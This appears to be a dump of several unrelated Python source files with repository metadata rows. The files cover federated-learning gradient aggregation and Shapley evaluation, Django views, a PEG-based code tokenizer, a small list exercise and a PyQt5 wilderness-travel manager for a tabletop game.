grad_update_2), "Lengths of the two grad_updates not equal"
for param_1, param_2 in zip(grad_update_1, grad_update_2):
param_1.data += param_2.data * weight
def aggregate_gradient_updates(grad_updates, R, device=None, mode='sum', credits=None, shard_sizes=None):
if grad_updates:
len_first = len(grad_updates[0])
assert all(len(i) == len_first for i in grad_updates), "Different shapes of parameters. Cannot aggregate."
else:
return
grad_updates_ = [copy.deepcopy(grad_update) for i, grad_update in enumerate(grad_updates) if i in R]
if device:
for i, grad_update in enumerate(grad_updates_):
grad_updates_[i] = [param.to(device) for param in grad_update]
if credits is not None:
credits = [credit for i, credit in enumerate(credits) if i in R]
if shard_sizes is not None:
shard_sizes = [shard_size for i,shard_size in enumerate(shard_sizes) if i in R]
aggregated_gradient_updates = []
if mode=='mean':
# default mean is FL-avg: weighted avg according to nk/n
if shard_sizes is None:
shard_sizes = torch.ones(len(grad_updates))
for i, (grad_update, shard_size) in enumerate(zip(grad_updates_, shard_sizes)):
grad_updates_[i] = [(shard_size * update) for update in grad_update]
for i in range(len(grad_updates_[0])):
aggregated_gradient_updates.append(torch.stack(
[grad_update[i] for grad_update in grad_updates_]).mean(dim=0))
elif mode =='sum':
for i in range(len(grad_updates_[0])):
aggregated_gradient_updates.append(torch.stack(
[grad_update[i] for grad_update in grad_updates_]).sum(dim=0))
elif mode == 'credit-sum':
# first changes the grad_updates altogether
for i, (grad_update, credit) in enumerate(zip(grad_updates_, credits)):
grad_updates_[i] = [(credit * update) for update in grad_update]
# then compute the credit weight sum
for i in range(len(grad_updates_[0])):
aggregated_gradient_updates.append(torch.stack(
[grad_update[i] for grad_update in grad_updates_]).sum(dim=0))
return aggregated_gradient_updates
def add_update_to_model(model, update, weight=1.0, device=None):
if not update: return model
if device:
model = model.to(device)
update = [param.to(device) for param in update]
for param_model, param_update in zip(model.parameters(), update):
param_model.data += weight * param_update.data
return model
def compare_models(model1, model2):
for p1, p2 in zip(model1.parameters(), model2.parameters()):
if p1.data.ne(p2.data).sum() > 0:
return False # two models have different weights
return True
def flatten(grad_update):
return torch.cat([update.data.view(-1) for update in grad_update])
def unflatten(flattened, normal_shape):
grad_update = []
for param in normal_shape:
n_params = len(param.view(-1))
grad_update.append( torch.as_tensor(flattened[:n_params]).reshape(param.size()) )
flattened = flattened[n_params:]
return grad_update
def evaluate(model, eval_loader, device, loss_fn=None, verbose=True):
model.eval()
model = model.to(device)
correct = 0
total = 0
with torch.no_grad():
for i, batch in enumerate(eval_loader):
if isinstance(batch, Batch):
batch_data, batch_target = batch.text, batch.label
# batch_data.data.t_(), batch_target.data.sub_(1) # batch first, index align
batch_data = batch_data.permute(1, 0)
else:
batch_data, batch_target = batch[0], batch[1]
batch_data, batch_target = batch_data.to(device), batch_target.to(device)
outputs = model(batch_data)
if loss_fn:
loss = loss_fn(outputs, batch_target)
else:
loss = None
correct += (torch.max(outputs, 1)[1].view(batch_target.size()).data == batch_target.data).sum()
total += len(batch_target)
accuracy = correct.float() / total
if verbose:
print("Loss: {:.6f}. Accuracy: {:.4%}.".format(loss, accuracy))
return loss, accuracy
'''
def one_on_one_evaluate(participants, federated_model, grad_updates, unfiltererd_grad_updates, eval_loader, device):
val_accs = []
for i, participant in enumerate(participants):
if participant.theta == 1:
model_to_eval = copy.deepcopy(participant.model)
add_update_to_model(model_to_eval, unfiltererd_grad_updates[i], device=device)
else:
model_to_eval = copy.deepcopy(federated_model)
add_update_to_model(model_to_eval, grad_updates[i], device=device)
_, val_acc = evaluate(model_to_eval, eval_loader, device, verbose=False)
del model_to_eval
val_accs.append(val_acc)
return val_accs
def leave_one_out_evaluate(federated_model, grad_updates, eval_loader, device):
loo_model = copy.deepcopy(federated_model)
loo_losses, loo_val_accs = [], []
for grad_update in grad_updates:
loo_model = add_update_to_model(loo_model, grad_update, weight = -1.0, device=device)
loss, val_acc = evaluate(loo_model, eval_loader, device, verbose=False)
loo_losses.append(loss)
loo_val_accs.append(val_acc)
loo_model = add_update_to_model(loo_model, grad_update, weight = 1.0, device=device)
# scalar - 1D torch tensor subtraction -> 1D torch tensor
# marginal_contributions = curr_val_acc - torch.tensor(loo_val_accs)
return loo_val_accs
'''
import numpy as np
np.random.seed(1111)
def random_split(sample_indices, m_bins, equal=True):
sample_indices = np.asarray(sample_indices)
if equal:
indices_list = np.array_split(sample_indices, m_bins)
else:
split_points = np.random.choice(
n_samples - 2, m_bins - 1, replace=False) + 1
split_points.sort()
indices_list = np.split(sample_indices, split_points)
return indices_list
import random
from itertools import permutations
def compute_shapley(grad_updates, federated_model, test_loader, device, Max_num_sequences=50):
num_participants = len(grad_updates)
all_sequences = list(permutations(range(num_participants)))
if len(all_sequences) > Max_num_sequences:
random.shuffle(all_sequences)
all_sequences = all_sequences[:Max_num_sequences]
test_loss_prev, test_acc_prev = evaluate(federated_model, test_loader, device, verbose=False)
prev_contribution = test_acc_prev.data
marginal_contributions = torch.zeros((num_participants))
for sequence in all_sequences:
running_model = copy.deepcopy(federated_model)
curr_contributions = []
for participant_id in sequence:
running_model = add_update_to_model(running_model, grad_updates[participant_id])
test_loss, test_acc = evaluate(running_model, test_loader, device, verbose=False)
contribution = test_acc.data
if not curr_contributions:
marginal_contributions[participant_id] += contribution - prev_contribution
else:
marginal_contributions[participant_id] += contribution - curr_contributions[-1]
curr_contributions.append(contribution)
return marginal_contributions / len(all_sequences) | 35.109589 | 123 | 0.757836 |
3ae65789d9458479266b8a51662e5436d0fc02db | 525 | py | Python | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Quizapplication | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 2 | 2018-11-04T06:44:58.000Z | 2018-11-15T19:19:19.000Z | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Quizapplication | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 2 | 2018-10-29T15:27:16.000Z | 2018-10-30T08:38:37.000Z | TNP Cell Website/classroom/views/classroom.py | kaustubh240897/Training_and_Placement_cell_IIITV | dcdf05670da649b602f26013a95b89b5c3a1585a | [
"MIT"
] | 3 | 2018-10-29T15:00:44.000Z | 2020-10-14T13:05:10.000Z | from django.shortcuts import redirect, render
from django.views.generic import TemplateView
class SignUpView(TemplateView):
template_name = 'registration/signup.html'
#homePage
def home(request):
if request.user.is_authenticated:
if request.user.is_teacher:
return redirect('teachers:my_jobs')
else:
return redirect('students:quiz_list')
return render(request, 'classroom/SE_home.html')
#why_we
def why_we(request):
return render(request, 'classroom/WHY_we.html')
| 25 | 52 | 0.72 |
3ae6ca75f3d3a8c0e269c42286630443d12eadfe | 102 | py | Python | fseval/pipelines/rank_and_validate/__init__.py | dunnkers/fseval | 49a11a63e09e65b1f14389b6ba3a9ae3aeae086d | [
"MIT"
] | 5 | 2020-07-08T11:58:46.000Z | 2022-01-26T13:58:00.000Z | fseval/pipelines/rank_and_validate/__init__.py | shenlong95/fseval | 4d2e6618b8838f9e52fe60621b08595dc4c5b4fb | [
"MIT"
] | 63 | 2021-05-09T06:18:24.000Z | 2022-03-27T18:05:58.000Z | fseval/pipelines/rank_and_validate/__init__.py | shenlong95/fseval | 4d2e6618b8838f9e52fe60621b08595dc4c5b4fb | [
"MIT"
] | 1 | 2022-02-11T03:24:14.000Z | 2022-02-11T03:24:14.000Z | from .rank_and_validate import BootstrappedRankAndValidate
__all__ = ["BootstrappedRankAndValidate"]
| 25.5 | 58 | 0.862745 |
3ae8972b7f0c8d8ea6d2f5706159829160fedc21 | 6,119 | py | Python | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | null | null | null | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | 1 | 2021-11-14T05:38:27.000Z | 2021-11-14T05:38:27.000Z | kolab/yk/yk.py | roy029/kolab | 10a3054da5e7c96c575de1336056eee65368c087 | [
"MIT"
] | 7 | 2020-11-02T13:05:44.000Z | 2022-01-09T11:06:04.000Z | from os import read
import sys
import pegtree as pg
import csv
from pegtree.optimizer import optimize
peg = pg.grammar('yk.tpeg')
parse = pg.generate(peg)
VAR_literal = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz'
NAME_literal = 'ABCDEFGHIJKLMNOPQRSTUVWXYZABCDEFGHIJKLMNOPQRSTUVWXYZ'
VAL_literal = 'abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz'
OPTION = {
'--notConv': False,
'--diff': False,
'--reverse': False,
}
def replace_as_special_parameter(s, mapped, tag=None): # mapped => {'df': '<A>'}
if s in mapped:
return mapped[s]
if tag == 'Name':
x = '<' + NAME_literal[len(mapped)] +'>' #辞書
elif tag == 'Value':
x = '<' + VAL_literal[len(mapped)] +'>' #辞書
else:
x = '<' + VAR_literal[len(mapped)] +'>' #辞書
mapped[s] = x
return x
def convert_nothing(tok, doc, mapped, diff):
s = str(tok)
if s == ';': # ; だけはセミコロンに変える
return '<sep>'
return s
def convert_all(tok, doc, mapped, diff):
tag = tok.getTag()
s = str(tok)
# print('@@', s, tag)
if diff:
if tag == 'Name':
if s in doc:
return replace_as_special_parameter(s, mapped, tag='Name')
else:
if s.startswith('.'):
s = '. ' + s[1:]
return s
if tag == 'Value':
# print(f"@@val '{s[1:-1]}'")
if s in doc:
return replace_as_special_parameter(s, mapped, tag='Value')
s_q1 = f"'{s[1:-1]}'"
if s_q1 in doc:
return replace_as_special_parameter(s_q1, mapped, tag='Value')
s_q2 = f'"{s[1:-1]}"'
if s_q2 in doc:
return replace_as_special_parameter(s_q2, mapped, tag='Value')
else:
if tag == 'Name':
if s in doc:
return replace_as_special_parameter(s, mapped)
else:
if s.startswith('.'):
s = '. ' + s[1:]
return s
if tag == 'Value':
if s in doc:
return replace_as_special_parameter(s, mapped)
s_q1 = f"'{s[1:-1]}'"
if s_q1 in doc:
return replace_as_special_parameter(s_q1, mapped)
s_q2 = f'"{s[1:-1]}"'
if s_q2 in doc:
return replace_as_special_parameter(s_q2, mapped)
return convert_nothing(tok, doc, mapped, diff)
def make(code, doc0, convert=convert_all, diff=False, reverse=False):
# print('BEFORE', code, doc)
mapped = {}
doc = []
flag = 0
for tok in parse(doc0):
s = str(tok)
# TODO: この分岐の意味とflagの意味
if tok.getTag() == 'Raw':
q = f"'{s}'"
q2 = f'"{s}"'
if q in code:
#print(f'`{s}` => {q}')
doc.append(q)
flag=1
continue
if q2 in code:
#print(f'`{s}` => {q2}')
doc.append(q2)
flag=1
continue
doc.append(s)
ws = [convert(tok, doc, mapped, diff) for tok in parse(code)]
# print('@@ws', ws)
code = ' '.join(ws)
if reverse:
reverse_stoken = {}
if convert == convert_all:
if diff:
cnt = 1
for k, v in mapped.items():
if v[1] in NAME_literal:
s_token = '<' + NAME_literal[len(mapped) - cnt] + '>'
else:
s_token = '<' + VAL_literal[len(mapped) - cnt] + '>'
mapped[k] = s_token
reverse_stoken[v] = s_token
cnt += 1
else:
cnt = 1
for k, v in mapped.items():
s_token = '<' + VAR_literal[len(mapped) - cnt] + '>'
mapped[k] = s_token
reverse_stoken[v] = s_token
cnt += 1
# print('@@rd', reverse_stoken)
ws_rev = [reverse_stoken[tok] if tok in reverse_stoken else tok for tok in ws]
code = ' '.join(ws_rev)
# print('@@mp', mapped)
ws = [mapped[tok] if tok in mapped else tok for tok in doc if tok.strip() != '']
doc = ' '.join(ws)
return code, doc
def read_tsv(input_filename, output_filename=None):
with open(input_filename) as f:
reader = csv.reader(f, delimiter='\t')
if output_filename != None:
writer = csv.writer(output_filename, delimiter='\t')
for row in reader:
code2 = None
if OPTION['--notConv']:
code, doc = make(row[0], row[1], convert=convert_nothing)
elif OPTION['--diff'] and OPTION['--reverse']:
code, doc = make(row[0], row[1], diff=True, reverse=False)
code2, doc2 = make(row[0], row[1], diff=True, reverse=True)
elif OPTION['--diff']:
code, doc = make(row[0], row[1], diff=True, reverse=False)
elif OPTION['--reverse']:
code, doc = make(row[0], row[1], diff=False, reverse=False)
code2, doc2 = make(row[0], row[1], diff=False, reverse=True)
else:
code, doc = make(row[0], row[1])
if output_filename == None:
print(code, doc)
if code2 != None and code2 != code:
print(code2, doc2)
else:
writer.writerow([code, doc])
if code2 != None and code2 != code:
writer.writerow([code2, doc2])
if __name__ == '__main__':
if len(sys.argv) > 1:
for filename in sys.argv[1:]:
if filename.startswith('-'):
if '=' not in filename:
filename += '=True'
key, value = filename.split('=')
OPTION[key] = int(value) if value.isdigit() else value == 'True'
continue
try:
read_tsv(filename, sys.stdout)
except:
read_tsv(filename)
else:
pass
| 32.897849 | 86 | 0.484393 |
3ae9c27cb433dee341880c12a91958034dceafbb | 270 | py | Python | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
] | null | null | null | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
] | null | null | null | Task2/02_list-dicts.py | telecomprofi/Cisco-DevOps-MDP-02 | f44173d468319a90dc6b7c5ea92cd6b8b3762b45 | [
"Apache-2.0"
] | null | null | null | country=["Brazil","Russia","India","China","South Africa"]
capitals={"Brazil":"Brasilia","Russia":"Moscow","India":"New Delhi",
"China":"Beijing","South Africa":["Pretoria","Cape Town","Bloemfontein"]}
print(country)
print(capitals)
print(capitals["South Africa"][1])
| 33.75 | 74 | 0.696296 |
3aea02ea9b227434bbb8b250a3ff42f885040255 | 17,501 | py | Python | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | 1 | 2021-02-27T16:33:53.000Z | 2021-02-27T16:33:53.000Z | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | null | null | null | Interface/Windows/WildernessTravelManagerWindow.py | Snackhole/SerpentRPG | 9e5ae019893592a46dd7681daba56af8e8e29744 | [
"MIT"
] | null | null | null | import math
import os
from PyQt5 import QtCore
from PyQt5.QtWidgets import QGridLayout, QLabel, QPushButton, QFrame, QTextEdit, QInputDialog, QSizePolicy, QAction, QMessageBox
from Core.DieClock import DieClock
from Core.WildernessTravelManager import WildernessTravelManager
from Interface.Widgets.LineEditMouseWheelExtension import LineEditMouseWheelExtension
from Interface.Windows.Window import Window
from SaveAndLoad.SaveAndOpenMixin import SaveAndOpenMixin
class WildernessTravelManagerWindow(Window, SaveAndOpenMixin):
def __init__(self, ScriptName, AbsoluteDirectoryPath):
# Store Absolute Directory Path for SaveAndOpenMixin
self.AbsoluteDirectoryPath = AbsoluteDirectoryPath
# Initialize
super().__init__(ScriptName, AbsoluteDirectoryPath)
# Create Wilderness Travel Manager
self.WildernessTravelManager = WildernessTravelManager()
# Set Up Save and Open
self.SetUpSaveAndOpen(".wildtrvl", "Wilderness Travel Manager", (WildernessTravelManager, DieClock))
# Update Display
self.UpdateDisplay()
def CreateInterface(self):
# Styles
self.LabelStyle = "QLabel {font-size: 20pt;}"
self.LineEditStyle = "QLineEdit {font-size: 20pt;}"
self.LineEditStyleYellow = "QLineEdit {font-size: 20pt; color: goldenrod;}"
self.LineEditStyleRed = "QLineEdit {font-size: 20pt; color: red;}"
self.PoolAndClockButtonStyle = "QPushButton {font-size: 20pt;}"
# Button and Line Edit Size Policy
self.ButtonAndLineEditSizePolicy = QSizePolicy(QSizePolicy.Minimum, QSizePolicy.Minimum)
# Pool and Clock Width
self.PoolAndClockWidth = 160
# Travel Actions Label
self.TravelActionsLabel = QLabel("Travel Actions")
self.TravelActionsLabel.setStyleSheet(self.LabelStyle)
self.TravelActionsLabel.setAlignment(QtCore.Qt.AlignCenter)
# Travel Action Buttons
self.MoveButton = QPushButton("Move")
self.MoveButton.clicked.connect(self.Move)
self.MoveButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.ForageButton = QPushButton("Forage")
self.ForageButton.clicked.connect(self.Forage)
self.ForageButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.SpendDaysButton = QPushButton("Spend Days")
self.SpendDaysButton.clicked.connect(self.SpendDays)
self.SpendDaysButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
# Wilderness Clock Label
self.WildernessClockLabel = QLabel("Wilderness Clock")
self.WildernessClockLabel.setStyleSheet(self.LabelStyle)
self.WildernessClockLabel.setAlignment(QtCore.Qt.AlignCenter)
# Wilderness Clock Current Value Line Edit
self.WildernessClockCurrentValueLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockCurrentValue(1 if event.angleDelta().y() > 0 else -1))
self.WildernessClockCurrentValueLineEdit.setReadOnly(True)
self.WildernessClockCurrentValueLineEdit.setAlignment(QtCore.Qt.AlignCenter)
self.WildernessClockCurrentValueLineEdit.setStyleSheet(self.LineEditStyle)
self.WildernessClockCurrentValueLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockCurrentValueLineEdit.setFixedWidth(self.PoolAndClockWidth)
# Wilderness Clock Current Value Buttons
self.WildernessClockCurrentValueIncreaseButton = QPushButton("+")
self.WildernessClockCurrentValueIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockCurrentValue(1))
self.WildernessClockCurrentValueIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockCurrentValueIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
self.WildernessClockCurrentValueDecreaseButton = QPushButton("-")
self.WildernessClockCurrentValueDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockCurrentValue(-1))
self.WildernessClockCurrentValueDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockCurrentValueDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
# Wilderness Clock Divider Label
self.WildernessClockDividerLabel = QLabel("/")
self.WildernessClockDividerLabel.setStyleSheet(self.LabelStyle)
self.WildernessClockDividerLabel.setAlignment(QtCore.Qt.AlignCenter)
# Wilderness Clock Maximum Value Line Edit
self.WildernessClockMaximumValueLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockMaximumValue(1 if event.angleDelta().y() > 0 else -1))
self.WildernessClockMaximumValueLineEdit.setReadOnly(True)
self.WildernessClockMaximumValueLineEdit.setAlignment(QtCore.Qt.AlignCenter)
self.WildernessClockMaximumValueLineEdit.setStyleSheet(self.LineEditStyle)
self.WildernessClockMaximumValueLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockMaximumValueLineEdit.setFixedWidth(self.PoolAndClockWidth)
# Wilderness Clock Maximum Value Buttons
self.WildernessClockMaximumValueIncreaseButton = QPushButton("+")
self.WildernessClockMaximumValueIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockMaximumValue(1))
self.WildernessClockMaximumValueIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockMaximumValueIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
self.WildernessClockMaximumValueDecreaseButton = QPushButton("-")
self.WildernessClockMaximumValueDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockMaximumValue(-1))
self.WildernessClockMaximumValueDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockMaximumValueDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
# Wilderness Clock Threshold Label
self.WildernessClockThresholdLabel = QLabel("Threshold")
self.WildernessClockThresholdLabel.setAlignment(QtCore.Qt.AlignCenter)
# Wilderness Clock Threshold Line Edit
self.WildernessClockThresholdLineEdit = LineEditMouseWheelExtension(lambda event: self.ModifyWildernessClockThreshold(1 if event.angleDelta().y() > 0 else -1))
self.WildernessClockThresholdLineEdit.setReadOnly(True)
self.WildernessClockThresholdLineEdit.setAlignment(QtCore.Qt.AlignCenter)
self.WildernessClockThresholdLineEdit.setStyleSheet(self.LineEditStyle)
self.WildernessClockThresholdLineEdit.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockThresholdLineEdit.setFixedWidth(self.PoolAndClockWidth)
# Wilderness Clock Threshold Buttons
self.WildernessClockThresholdIncreaseButton = QPushButton("+")
self.WildernessClockThresholdIncreaseButton.clicked.connect(lambda: self.ModifyWildernessClockThreshold(1))
self.WildernessClockThresholdIncreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockThresholdIncreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
self.WildernessClockThresholdDecreaseButton = QPushButton("-")
self.WildernessClockThresholdDecreaseButton.clicked.connect(lambda: self.ModifyWildernessClockThreshold(-1))
self.WildernessClockThresholdDecreaseButton.setSizePolicy(self.ButtonAndLineEditSizePolicy)
self.WildernessClockThresholdDecreaseButton.setStyleSheet(self.PoolAndClockButtonStyle)
# Wilderness Log Label
self.WildernessLogLabel = QLabel("Wilderness Log")
self.WildernessLogLabel.setStyleSheet(self.LabelStyle)
self.WildernessLogLabel.setAlignment(QtCore.Qt.AlignCenter)
# Wilderness Log Text Edit
self.WildernessLogTextEdit = QTextEdit()
self.WildernessLogTextEdit.setReadOnly(True)
# Create Layout
self.Layout = QGridLayout()
# Travel Action Widgets in Layout
self.TravelActionsFrame = QFrame()
self.TravelActionsFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
self.TravelActionsLayout = QGridLayout()
self.TravelActionsLayout.addWidget(self.TravelActionsLabel, 0, 0)
self.TravelActionsLayout.addWidget(self.MoveButton, 1, 0)
self.TravelActionsLayout.addWidget(self.ForageButton, 2, 0)
self.TravelActionsLayout.addWidget(self.SpendDaysButton, 3, 0)
for Row in range(1, 4):
self.TravelActionsLayout.setRowStretch(Row, 1)
self.TravelActionsFrame.setLayout(self.TravelActionsLayout)
self.Layout.addWidget(self.TravelActionsFrame, 0, 0)
# Add Wilderness Clock Widgets to Layout
self.WildernessClockFrame = QFrame()
self.WildernessClockFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
self.WildernessClockLayout = QGridLayout()
self.WildernessClockLayout.addWidget(self.WildernessClockLabel, 0, 0, 1, 3)
self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueIncreaseButton, 1, 0)
self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueLineEdit, 2, 0)
self.WildernessClockLayout.addWidget(self.WildernessClockCurrentValueDecreaseButton, 3, 0)
self.WildernessClockLayout.addWidget(self.WildernessClockDividerLabel, 2, 1)
self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueIncreaseButton, 1, 2)
self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueLineEdit, 2, 2)
self.WildernessClockLayout.addWidget(self.WildernessClockMaximumValueDecreaseButton, 3, 2)
self.WildernessClockThresholdFrame = QFrame()
self.WildernessClockThresholdLayout = QGridLayout()
self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdLabel, 0, 0, 1, 3)
self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdDecreaseButton, 1, 0)
self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdLineEdit, 1, 1)
self.WildernessClockThresholdLayout.addWidget(self.WildernessClockThresholdIncreaseButton, 1, 2)
self.WildernessClockThresholdFrame.setLayout(self.WildernessClockThresholdLayout)
self.WildernessClockLayout.addWidget(self.WildernessClockThresholdFrame, 4, 0, 1, 3)
self.WildernessClockLayout.setRowStretch(1, 1)
self.WildernessClockLayout.setRowStretch(2, 2)
self.WildernessClockLayout.setRowStretch(3, 1)
self.WildernessClockFrame.setLayout(self.WildernessClockLayout)
self.Layout.addWidget(self.WildernessClockFrame, 0, 1)
# Add Wilderness Log Widgets to Layout
self.WildernessLogFrame = QFrame()
self.WildernessLogFrame.setFrameStyle(QFrame.Panel | QFrame.Plain)
self.WildernessLogLayout = QGridLayout()
self.WildernessLogLayout.addWidget(self.WildernessLogLabel, 0, 0)
self.WildernessLogLayout.addWidget(self.WildernessLogTextEdit, 1, 0)
self.WildernessLogFrame.setLayout(self.WildernessLogLayout)
self.Layout.addWidget(self.WildernessLogFrame, 0, 2)
# Set and Configure Layout
self.Layout.setColumnStretch(2, 1)
self.Frame.setLayout(self.Layout)
# Create Menu Actions
self.NewAction = QAction("New")
self.NewAction.setShortcut("Ctrl+N")
self.NewAction.triggered.connect(self.NewActionTriggered)
self.OpenAction = QAction("Open")
self.OpenAction.setShortcut("Ctrl+O")
self.OpenAction.triggered.connect(self.OpenActionTriggered)
self.SaveAction = QAction("Save")
self.SaveAction.setShortcut("Ctrl+S")
self.SaveAction.triggered.connect(self.SaveActionTriggered)
self.SaveAsAction = QAction("Save As")
self.SaveAsAction.setShortcut("Ctrl+Shift+S")
self.SaveAsAction.triggered.connect(self.SaveAsActionTriggered)
self.QuitAction = QAction("Quit")
self.QuitAction.setShortcut("Ctrl+Q")
self.QuitAction.triggered.connect(self.close)
self.AddToLogAction = QAction("Add to Log")
self.AddToLogAction.triggered.connect(self.AddToLog)
self.RemoveLastLogEntryAction = QAction("Remove Last Log Entry")
self.RemoveLastLogEntryAction.triggered.connect(self.RemoveLastLogEntry)
self.ClearLogAction = QAction("Clear Log")
self.ClearLogAction.triggered.connect(self.ClearLog)
# Menu Bar
self.MenuBar = self.menuBar()
self.FileMenu = self.MenuBar.addMenu("File")
self.FileMenu.addAction(self.NewAction)
self.FileMenu.addAction(self.OpenAction)
self.FileMenu.addSeparator()
self.FileMenu.addAction(self.SaveAction)
self.FileMenu.addAction(self.SaveAsAction)
self.FileMenu.addSeparator()
self.FileMenu.addAction(self.QuitAction)
self.LogMenu = self.MenuBar.addMenu("Log")
self.LogMenu.addAction(self.AddToLogAction)
self.LogMenu.addAction(self.RemoveLastLogEntryAction)
self.LogMenu.addAction(self.ClearLogAction)
# Modify Values Methods
def ModifyWildernessClockCurrentValue(self, Delta):
self.WildernessTravelManager.ModifyWildernessClockCurrentValue(Delta)
self.UpdateUnsavedChangesFlag(True)
def ModifyWildernessClockMaximumValue(self, Delta):
self.WildernessTravelManager.ModifyWildernessClockMaximumValue(Delta)
self.UpdateUnsavedChangesFlag(True)
def ModifyWildernessClockThreshold(self, Delta):
self.WildernessTravelManager.ModifyWildernessClockThreshold(Delta)
self.UpdateUnsavedChangesFlag(True)
# Travel Action Methods
def Move(self):
TravelTime, OK = QInputDialog.getInt(self, "Travel Time", "Travel time of movement:", 1, 1)
if OK:
self.WildernessTravelManager.Move(TravelTime)
self.UpdateUnsavedChangesFlag(True)
def Forage(self):
self.WildernessTravelManager.Forage()
self.UpdateUnsavedChangesFlag(True)
def SpendDays(self):
DaysSpent, DaysSpentOK = QInputDialog.getInt(self, "Spend Days", "Days spent:", 1, 1)
if DaysSpentOK:
Activity, ActivityOK = QInputDialog.getText(self, "Activity", "Spent " + str(DaysSpent) + " days...")
if ActivityOK:
if Activity == "":
Activity = None
self.WildernessTravelManager.SpendDays(DaysSpent, Activity=Activity, Log=True)
self.UpdateUnsavedChangesFlag(True)
# File Menu Action Methods
def NewActionTriggered(self):
if self.New(self.WildernessTravelManager):
self.WildernessTravelManager = WildernessTravelManager()
self.UpdateDisplay()
def OpenActionTriggered(self):
OpenData = self.Open(self.WildernessTravelManager)
if OpenData is not None:
self.WildernessTravelManager = OpenData
self.UpdateDisplay()
def SaveActionTriggered(self):
self.Save(self.WildernessTravelManager)
self.UpdateDisplay()
def SaveAsActionTriggered(self):
self.Save(self.WildernessTravelManager, SaveAs=True)
self.UpdateDisplay()
# Log Menu Action Methods
def AddToLog(self):
LogString, OK = QInputDialog.getText(self, "Add to Log", "Add this to the Wilderness Log:")
if OK:
self.WildernessTravelManager.Log(LogString)
self.UpdateUnsavedChangesFlag(True)
def RemoveLastLogEntry(self):
if self.DisplayMessageBox("Are you sure you want to remove the last log entry? This cannot be undone.", Icon=QMessageBox.Question, Buttons=(QMessageBox.Yes | QMessageBox.No)) == QMessageBox.Yes:
self.WildernessTravelManager.RemoveLastLogEntry()
self.UpdateUnsavedChangesFlag(True)
def ClearLog(self):
if self.DisplayMessageBox("Are you sure you want to clear the log? This cannot be undone.", Icon=QMessageBox.Question, Buttons=(QMessageBox.Yes | QMessageBox.No)) == QMessageBox.Yes:
self.WildernessTravelManager.ClearLog()
self.UpdateUnsavedChangesFlag(True)
# Display Update Methods
def UpdateDisplay(self):
# Wilderness Clock Display
self.WildernessClockCurrentValueLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.Value))
self.WildernessClockMaximumValueLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.MaximumValue))
self.WildernessClockThresholdLineEdit.setText(str(self.WildernessTravelManager.WildernessClock.ComplicationThreshold))
# Wilderness Log Display
WildernessLogString = ""
for LogEntry in reversed(self.WildernessTravelManager.WildernessLog):
WildernessLogString += LogEntry + "\n\n---\n\n"
self.WildernessLogTextEdit.setPlainText(WildernessLogString[:-7])
# Update Window Title
self.UpdateWindowTitle()
def UpdateWindowTitle(self):
CurrentFileTitleSection = " [" + os.path.basename(self.CurrentOpenFileName) + "]" if self.CurrentOpenFileName != "" else ""
UnsavedChangesIndicator = " *" if self.UnsavedChanges else ""
self.setWindowTitle("Wilderness Travel Manager - " + self.ScriptName + CurrentFileTitleSection + UnsavedChangesIndicator)
def UpdateUnsavedChangesFlag(self, UnsavedChanges):
self.UnsavedChanges = UnsavedChanges
self.UpdateDisplay()
| 52.241791 | 203 | 0.746186 |